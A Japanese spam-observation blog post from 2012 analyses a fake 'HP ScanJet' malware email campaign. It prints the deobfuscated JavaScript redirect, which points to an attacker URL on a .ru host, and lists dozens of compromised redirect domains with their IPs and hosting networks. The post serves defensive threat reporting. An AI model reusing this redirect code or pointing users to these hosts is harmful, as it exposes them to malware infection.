cNotes 検索一覧カテゴリ

Scan from a Hewlett-Packard ScanJet - wp-local.htm

Published: 2012/10/11

観測日： 2012/10/10

通数： 20通/day

手法：誘導URL型

目的：マルウェア感染

よくあるScanjetネタですが、一段目のwp-local.htmが単純なリダイレクトhtmlではなくjavascriptで難読化されてます。

文面。

wp-local.htmの中身。

このjavascriptは実行するとこのようになります。

 var1 = 49;
 var2 = var1;
 if (var1 == var2){
  document.location = "http://samsungonetouch.ru:8080/forum/links/column.php";
 }

最近よく見る手法のjs.jsファイルの中にかかれているタイプのURLが登場します。

リダイレクトの段数が一段すくないというわけですね。

domain	ip	逆引き	AS	AS Name	Country
adsn.biz	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
affo.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
amybazar.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
angelocottone.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
artecuoioab.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
associazione-esperance-onlus-bo.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
babbo-natale.com	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
bellafirma.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
brahmavidya.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
carmeloshadow.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
castellodiflambruzzo.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
cittafuturainfo.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
enzoleone.ge.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
freecomunication.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
gianmarcocapraro.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
ilmiosalento.it	93.95.218.17	ns1.trovanome.it.	3313	INET-AS_BT_Italia_S.p.A.	Italy
pneumatyka.32.pl	83.17.0.148	pocztowy.mojsprzet.pl.	5617	TPNET_Telekomunikacja_Polska_S.A.	Poland
rommebel.by	91.149.157.46	vh42.hoster.by.	6697	BELPAK-AS_Republican_Association_BELTELECOM	Belarus
www.cartronix.de	81.169.145.149	w95.rzone.de.	6724	STRATO_STRATO_AG	Germany
www.asccelle.com	62.75.193.167	static-ip-62-75-193-167.inaddr.ip-pool.com.	8972	PLUSSERVER-AS_intergenia_AG	Germany
www.schackie.dk	87.238.248.224	simone.andersenit.dk.	9167	WEBPARTNER_WEBPARTNER_A/S_is_a_Danish_Internet_Service_Provider	Denmark
thomas.com.kz	82.200.202.152	202152.vps.dnr.kz.	9198	KAZTELECOM-AS_JSC_Kazakhtelecom	Kazakhstan
apredial.com.br	200.233.70.146	secg70.secrel.com.br.	11921	Secrelnet_Informatica_LTDA	Brazil
connemara.seguret.chez.com	212.27.63.127	perso127-g5.free.fr.	12322	PROXAD_Free_SAS	France
www.tietokeskus.fi	213.145.216.68	NONE	13170	KPO-AS_Kaisanet_Oy	Finland
www.demandenergy.net	64.191.152.130	www.sustainablealuminium.com.	13776	QX-NET-ASN-1_-_QX.Net	UnitedStates
www.ingeled.cl	190.96.85.131	srv131.hostingcl.cl.	14259	Gtd_Internet_S.A.	Chile
www.kompetentni.wscil.edu.pl	77.55.126.200	aew200.rev.netart.pl.	15967	NETART_NetArt_Spolka_Akcyjna_Spolka_Komandytowo-Akcyjna	Poland
www.mgoklipiany.pl	85.128.163.51	alg51.rev.netart.pl.	15967	NETART_NetArt_Spolka_Akcyjna_Spolka_Komandytowo-Akcyjna	Poland
www.skuteczniejsprzedawac.chodkowska.edu.pl	77.55.127.200	aex200.rev.netart.pl.	15967	NETART_NetArt_Spolka_Akcyjna_Spolka_Komandytowo-Akcyjna	Poland
findlooks.hipersoft.ru	94.75.204.250	argon.vps-private.net.	16265	LEASEWEB_LeaseWeb_B.V.	Netherlands
hipersoft.ru	94.75.204.250	argon.vps-private.net.	16265	LEASEWEB_LeaseWeb_B.V.	Netherlands
roskukla.u4756.argon.vps-private.net	94.75.204.250	argon.vps-private.net.	16265	LEASEWEB_LeaseWeb_B.V.	Netherlands
shophip.u4756.argon.vps-private.net	94.75.204.250	argon.vps-private.net.	16265	LEASEWEB_LeaseWeb_B.V.	Netherlands
antoninetlouise.eu	213.186.33.4	cluster003.ovh.net.	16276	OVH_OVH_Systems	France
bhjxj.net	203.158.16.38	NONE	17964	DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.	China
dlhanyi.com	115.47.170.175	NONE	17964	DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.	China
fuhaishicai.xinji.us	115.47.203.91	NONE	17964	DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.	China
sailingtech.org	180.86.188.55	NONE	17964	DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.	China
www.hxyyq.com	203.158.16.38	NONE	17964	DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.	China
xinjipeilian.com	203.158.16.38	NONE	17964	DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.	China
yibangdesign.com	203.158.16.72	NONE	17964	DXTNET_Beijing_Dian-Xin-Tong_Network_Technologies_Co._Ltd.	China
school32-nv.ru	81.24.117.118	hosting.severen.net.	24739	SEVEREN-TELECOM_CJSC_Severen-Telecom	RussianFederation
clientes.digitalk.cl	69.163.253.110	apache2-nads.libreville.dreamhost.com.	26347	DREAMHOST-AS_-_New_Dream_Network_LLC	UnitedStates
tramthytrang.com	118.139.185.1	sg2nlhg266c1266.shr.prod.sin2.secureserver.net.	26496	AS-26496-GO-DADDY-COM-LLC_-_GoDaddy.com_LLC	Singapore
unblock.ispghosting.com	118.139.175.128	ip-118-139-175-128.ip.secureserver.net.	26496	AS-26496-GO-DADDY-COM-LLC_-_GoDaddy.com_LLC	Singapore
www.tecknu.com	72.167.34.121	ip-72-167-34-121.ip.secureserver.net.	26496	AS-26496-GO-DADDY-COM-LLC_-_GoDaddy.com_LLC	UnitedStates
www.edsapartments.co.uk	77.72.204.74	NONE	29017	GYRON_====	UnitedKingdom
isabelamuci.net	98.130.164.2	rev.opentransfer.com.2.164.130.98.in-addr.arpa.	32392	OPENTRANSFER-ECOMMERCE_-_Ecommerce_Corporation	UnitedStates
mobile.pedromorales.com	98.130.164.2	rev.opentransfer.com.2.164.130.98.in-addr.arpa.	32392	OPENTRANSFER-ECOMMERCE_-_Ecommerce_Corporation	UnitedStates
screensavers.pedromorales.com	98.130.164.2	rev.opentransfer.com.2.164.130.98.in-addr.arpa.	32392	OPENTRANSFER-ECOMMERCE_-_Ecommerce_Corporation	UnitedStates
retailcomm.info	98.129.229.55	NONE	33070	RMH-14_-_Rackspace_Hosting	UnitedStates
dugda.admzr.ru	79.105.184.73	host.admzr.ru.	34137	RUAMUR-AS_OJSC_Rostelecom	RussianFederation
www.felena.hu	109.200.8.122	server9.megacp.com.	35662	REDSTATION_Redstation_Limited	UnitedKingdom
legobb.com	116.255.205.70	NONE	37943	CNNIC-GIANT_ZhengZhou_GIANT_Computer_Network_Technology_Co._Ltd	China
makrus.org	37.140.192.8	server37.hosting.reg.ru.	39134	SKYMEDIA_United_Network_LLC	RussianFederation
www.mmmtlt.ru	31.31.196.43	server36.hosting.reg.ru.	39792	ANDERS-AS_Anders_Telecom_Ltd.	RussianFederation
www.hermina.pl	193.42.154.8	ip-193-42-154-8.forward.pl.	42673	SKYWARE-AS_SKYware_s.c._Rzeszow_Poland	Poland
cb-sputnik.ru	78.108.80.10	web-farm1.majordomo.ru.	43362	MAJORDOMO_MAJORDOMO_LLC	RussianFederation
cb-sputnik.ru	78.108.86.10	web-farm1.majordomo.ru.	43362	MAJORDOMO_MAJORDOMO_LLC	RussianFederation
salsamalsa.com	77.245.149.33	srv75626s1.trdns.com.	43391	NETDIREKT-TR_Netdirekt_A.S.	Turkey
yaraticifikir.com	77.245.149.55	host55.b6.nw.com.tr.	43391	NETDIREKT-TR_Netdirekt_A.S.	Turkey
soluxtour.ru	77.222.61.16	vh13.sweb.ru.	44112	SWEB-AS_SpaceWeb_JSC	RussianFederation
darkhorsesales.com	173.254.28.119	just119.justhost.com.	46606	BLUEHOST-AS-2_-_Bluehost_Inc.	UnitedStates
www.ihbp.org	69.89.31.105	box305.bluehost.com.	46606	BLUEHOST-AS-2_-_Bluehost_Inc.	UnitedStates
school35.centerstart.ru	217.19.105.238	217-19-105-238.synterra-ug.ru.	47218	SYNTERRA-UG-AS_OJSC_MegaFon	RussianFederation
school82.centerstart.ru	217.19.105.238	217-19-105-238.synterra-ug.ru.	47218	SYNTERRA-UG-AS_OJSC_MegaFon	RussianFederation
hetzijnertwee.nl	91.229.232.54	cpweb01.tornadosolutions.nl.	50673	SERVERIUS-AS_Serverius_Holding_B.V.	Netherlands
www.atriaco.sk	195.210.29.7	max.websupport.sk.	51013	WEBSUPPORT-SRO-SK-AS_Websupport_s.r.o.	Slovakia
www.areo.dk	46.30.211.59	webcluster04.one.com.	51468	ONECOM_One.com_A/S	Denmark
bappeda.babelprov.go.id	49.50.8.249	bondol.n.masterweb.net.	55660	MWN-AS-ID_PT_Master_Web_Network	Indonesia
hardgamer.ru	188.0.1.243	PPPoE-188.0.1.243-IP.RastrNET.RU.	57261	RASTR-AS_Rastr_Ltd.	RussianFederation

[カテゴリ:spam観察日記]

by jyake

Scan from a Hewlett-Packard ScanJet - wp-local.htm

TOP

Contents

About cNotes

What's New